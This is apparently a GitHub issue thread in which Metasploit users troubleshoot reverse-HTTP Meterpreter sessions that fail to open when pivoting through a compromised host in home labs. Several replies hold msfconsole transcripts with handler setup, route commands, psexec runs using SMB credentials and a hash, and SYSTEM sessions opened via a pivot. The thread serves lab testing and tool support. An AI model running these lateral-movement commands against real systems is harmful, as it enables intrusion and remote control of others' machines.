Using meterpreter_reverse_http Payload for pivoting

[MDhouiou]

Hi,

I'm testing some attack scenarios in my home lab. To gain initial access to the first machine, I am utilizing the linux/x64/meterpreter_reverse_http payload. Subsequently, I am employing the same payload to facilitate lateral movement to the second machine.

Scenario: Kali ->(metrpreter_reverse_http)->First target (Debian) ->(metrpreter_reverse_http)->Second target (Debian)

While the first session works fine without any problems, when I set up the listener for the second session and run the second payload on the second target VM, it doesn't open the second session.

I do recieve the request to the handler but no session is opened..

[First Session works]

[Second Session not opening]

I've also tested the scenario: Kali ->(linux/x64/metrpreter_reverse_http)->First target (Debian) ->(windows/metrpreter_reverse_http)->Second target (windows)

In this case, both sessions work without any problem.

So, my question is: Why can't the second session be opened in the first scenario?

I would greatly appreciate any assistance or guidance from anyone who can help.

Thank you :)

[smcintyre-r7]

I'm thinking there's a configuration error here. Would it be possible for you to:

• [ ] Copy and paste the actual text from the msfconsole session instead of sharing screen shots. This should include all of the datastore options for the handler configuration (just run show options).
• [ ] Note in your diagram above the IP addresses of all three machines, kali, debian and Windows

[MDhouiou]

Hi Spencer,

Here is the configuration of the VMS:

--First Scenario with two linux target VMs--
Kali: 172.16.1.200/24
Debian(First Target): 172.16.1.10/24
Debian(Second Target): 172.16.1.20/24

--Second Scenario with linux and windows target VMs--
Kali: 172.16.1.200/24
Debian(First Target): 172.16.1.10/24
Windows(Second Target): 172.16.1.100/24

And here is the copied text from the msfconsole with the payload options:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_http
PAYLOAD => linux/x64/meterpreter_reverse_http

msf6 exploit(multi/handler) > set LHOST 172.16.1.200
LHOST => 172.16.1.200
msf6 exploit(multi/handler) > set LPORT 3980
LPORT => 3980
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):                                                                                     

   Name  Current Setting  Required  Description                                                                             
   ----  ---------------  --------  -----------                                                                             

Payload options (linux/x64/meterpreter_reverse_http):                                                                       

   Name   Current Setting  Required  Description                                                                            
   ----   ---------------  --------  -----------                                                                            
   LHOST  172.16.1.200     yes       The local listener hostname                                                            
   LPORT  3980             yes       The local listener port                                                                
   LURI                    no        The HTTP Path                                                                          

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started HTTP reverse handler on http://172.16.1.200:3980
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwUXNNxKiAdLGTEbkDxyqw6Nn5UVKVWBTlMuEK with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARw0AgELhZdc5oi0NuuuQkYPNKLjQsVygYEOs2rOeVujNJ6ERY1D-saOg0Eamx94KUdIrdtQJpIZtayQpQziToz with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARw8ZyB1bn with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwCRrS8K3T503x6vrUduA2rmApNRQrA7PsGbawYNH8o6j4wV86UT-pBAdVNgYYoKaA1m371Pp-a5-pcLi9MN6h_W_45knsYzMJf8dl3tU with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Redirecting stageless connection from /zk_HKJofBAD2T_BNk76ARwXM_ddLz17HR16-lrIH7eCD7CP7vNlyNznpivYelTPhStOGQJrlwKaoaFL_Iroqd_bVa9U5REWpNm9rw with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15'
[*] http://172.16.1.200:3980 handling request from 172.16.1.10; (UUID: ghwp07xt) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.16.1.200:3980 -> 172.16.1.10:39852) at 2024-03-13 10:46:52 +0100

msf6 exploit(multi/handler) > route add 172.16.1.0/24 1
[*] Route added
msf6 exploit(multi/handler) > set LHOST 172.16.1.10
LHOST => 172.16.1.10

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (linux/x64/meterpreter_reverse_http):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.1.10      yes       The local listener hostname
   LPORT  3980             yes       The local listener port
   LURI                    no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/handler) >
[*] Started HTTP reverse handler on http://172.16.1.10:3980
msf6 exploit(multi/handler) >
[*] http://172.16.1.10:3980 handling request from 172.16.1.20; (UUID: paiwgyxe) Redirecting stageless connection from /wsH7kz2P3E77yv3InjuMzAfVrCiLtiO7c with UA 'Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'

Thank you for your support :)

[smcintyre-r7]

What's the output of the jobs command? It should show that the multi/handler module is running and in the Payload options that it's listening via the session. That would be an important thing to confirm. Next you should use your session on the first compromised host (Debian 1 172.16.1.10) and run netstat to ensure that it's listening on 3980.

If all that's in place, you should check that Debian 1 doesn't have any kind of firewall or anything that'd be preventing the connection from the second target.

It looks like everything you've setup is correct but checking those things can help eliminate some common problems.

[LongWayHomie]

Hello, bumping it since I have similar problem with windows/x64/meterpreter/reverse_http payload. Pivoting with this payload seems to be not valid and msf does not spawn a session. Here's a snippet from my lab:

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share

   Used when making a new connection via RHOSTS:

   Name       Current Setting                                                    Required  Description
   ----       ---------------                                                    --------  -----------
   RHOSTS     10.10.122.30                                                       no        The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445                                                                no        The target port (TCP)
   SMBDomain  dev.cyberbotic.io                                                  no        The Windows domain to use for authentication
   SMBPass    59fc0f884922b4ce376051134c71e22c:59fc0f884922b4ce376051134c71e22c  no        The password for the specified username
   SMBUser    jking                                                              no        The username to authenticate as

   Used when connecting via an existing SESSION:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   no        The session to run this module on

Payload options (windows/x64/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.123.102    yes       The local listener hostname
   LPORT     5555             yes       The local listener port
   LURI                       no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   1   PowerShell

View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > set LPORT 6666
LPORT => 6666
msf6 exploit(windows/smb/psexec) > exploit

[*] 10.10.122.30:445 - Connecting to the server...
[*] 10.10.122.30:445 - Authenticating to 10.10.122.30:445|dev.cyberbotic.io as user 'jking'...
[*] 10.10.122.30:445 - Executing the payload...
[+] 10.10.122.30:445 - Service start timed out, OK if running a command or non-service executable...
[!] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Without a database connected that payload UUID tracking will not work!
[*] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Staging x64 payload (202844 bytes) ...
[!] http://10.10.123.102:6666 handling request from 10.10.122.30; (UUID: ajjzjj73) Without a database connected that payload UUID tracking will not work!
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > sessions

Active sessions
===============

  Id  Name  Type                     Information            Connection
  --  ----  ----                     -----------            ----------
  6         meterpreter x64/windows  DEV\jking @ WKSTN-2    10.9.254.6:8080 -> 10.10.122.254:44120 (10.10.122.254)
  7         meterpreter x64/windows  DEV\bfarmer @ WKSTN-2  10.9.254.6:8080 -> 10.10.122.254:44122 (10.10.123.102)
  8         meterpreter x64/windows  DEV\bfarmer @ WKSTN-2  10.9.254.6:8080 -> 10.10.122.254:44154 (10.10.122.254)
  9         meterpreter x64/windows                         10.10.122.30:6666 -> 10.10.122.30:57286 via session 7 (10.10.122.30)

msf6 exploit(windows/smb/psexec) > 
[-] Meterpreter session 9 is not valid and will be closed
[*] 10.10.122.30 - Meterpreter session 9 closed.  Reason: Died

msf6 exploit(windows/smb/psexec) > jobs

Jobs
====

  Id  Name                           Payload                               Payload opts
  --  ----                           -------                               ------------
  1   Auxiliary: server/socks_proxy
  21  Exploit: multi/handler         windows/x64/meterpreter/reverse_http  http://10.9.254.6:8080
  23  Exploit: multi/handler         windows/x64/meterpreter/reverse_http  http://10.10.123.102:6666 via the meterpreter on session 7

MSF is listening on 10.9.254.6 (Kali) and listener is also set up on first victim (pivot) on 10.10.123.102 on port 6666. Trying to spawn session on server 10.10.122.30, but session is dying while downloading from stager. I have tried with other HTTP payload which was windows/x64/meterpreter/reverse_winhttp and it seems it's working fine. So my best guess is that reverse_http is making some problems while pivoting. And yeah, there's squid proxy in lab, which is proxying traffic for workstations (10.10.123.102).

[smcintyre-r7]

Yeah, I still can't reproduce any issues here. In my lap setup .128 is my system running Metasploit, .10 is one Windows target and .40 is another. I'm able to open my first Meterpreter session to .10 and then a second to .40 by having Metasploit start a listener on .10. I tried with the reverse_http, reverse_https and reverse_winhttp stagers. All of them worked.

metasploit-framework (S:0 J:0) exploit(windows/smb/psexec) > run RHOSTS=192.168.159.10 SMBPass=Password1! LHOST=192.168.159.128 PAYLOAD=windows/x64/meterpreter/reverse_http

[*] Started HTTP reverse handler on http://192.168.159.128:8080
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] http://192.168.159.128:8080 handling request from 192.168.159.10; (UUID: 5tm6qdwe) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 13 opened (192.168.159.128:8080 -> 192.168.159.10:49840) at 2024-04-15 10:18:23 -0400

meterpreter > background 
[*] Backgrounding session 13...
metasploit-framework (S:1 J:0) exploit(windows/smb/psexec) > run RHOSTS=192.168.159.40 SMBPass=Password2! LHOST=192.168.159.10 ReverseListenerComm=13 PAYLOAD=windows/x64/meterpreter/reverse_http

[*] Started HTTP reverse handler on http://192.168.159.10:8080
[*] 192.168.159.40:445 - Connecting to the server...
[*] 192.168.159.40:445 - Authenticating to 192.168.159.40:445 as user 'smcintyre'...
[*] 192.168.159.40:445 - Selecting PowerShell target
[*] 192.168.159.40:445 - Executing the payload...
[+] 192.168.159.40:445 - Service start timed out, OK if running a command or non-service executable...
[*] http://192.168.159.10:8080 handling request from 192.168.159.40; (UUID: aoiyj5x9) Staging x64 payload (202844 bytes) ...
[*] Meterpreter session 14 opened (192.168.159.40:8080 -> 192.168.159.40:64828 via session 13) at 2024-04-15 10:18:43 -0400

meterpreter > background 
[*] Backgrounding session 14...
metasploit-framework (S:2 J:0) exploit(windows/smb/psexec) > sessions

Active sessions
===============

  Id  Name  Type                     Information                 Connection
  --  ----  ----                     -----------                 ----------
  13        meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DC    192.168.159.128:8080 -> 192.168.159.10:49840 (192.168.159.10)
  14        meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DC22  192.168.159.40:8080 -> 192.168.159.40:64828 via session 13 (192.168.159.40)

metasploit-framework (S:2 J:0) exploit(windows/smb/psexec) > 

I recommend you try to simplify your setup as I did by not using the exploit/multi/handler module and just have the psexec exploit start the listener. You can tell it which session to use to start the handler with the ReverseListenerComm datastore option.

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions[bot]]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.